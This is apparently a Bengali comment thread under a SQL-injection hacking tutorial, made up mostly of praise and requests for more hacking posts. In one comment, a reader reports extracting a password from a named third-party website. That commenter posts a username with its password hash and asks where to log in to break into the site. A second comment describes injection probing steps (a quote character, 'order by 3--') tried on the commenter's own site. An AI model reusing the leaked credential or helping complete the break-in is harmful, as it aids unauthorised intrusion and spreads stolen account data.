ভাই, আপনার SparkleAppeal সাইটের পাস পর্যন্ত গিয়েছি। এখন সমস্যা দুইটঃ
১। কোনটা ইউজারনেম কোনটা পাস বুঝতে পারছি না। পাস দেখাচ্ছে এরকমঃ VecDiana$:4f3120624f28e5d8e21d4d3cc1a030b38a2e747347f287ea1fa9089cc593137e
২। ওয়েবসাইটটি যদি(যদি) হ্যাক করতে চাই, তাহলে লগিন করব কোথা থেকে?
Thankxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx guru, josh ekta tune………………………………………………………………………………………………
এক কথায় ফাটিয়া দিয়েছেন গুরু। আমি টিকটিউনস্ নতুন আমার প্রথম কমমেন্ট আপনার এ পোস্ট টা দিয়ে শুরু করলাম …………..
vai aro new new chain tunes koren hacking er upore amader shobar onek kaje lagbe… @ Script Kiddie
টিউনটা ভালো লাগলো, নিজের সাইটকে প্রথমে হ্যাক করার চেষ্টা করে দেখলাম, কিন্তু ‘ string দেবার পর error ছাড়া পরের ধাপে আর যাচ্ছেনা, মানে order by 3– এভাবে অনেক চেষ্টা করে কোন error পেলাম না। অথচ যেহেতু আমার নিজের সাইট টেবিলের সঠিক কলাম নাম্বার আমার জানা আছে। দয়া করে জানাবেন কেন আর আগাতে পারছিনা?
টিউনতো নয় যেন আগুনেরই গোলা 😀 😀 😛 😆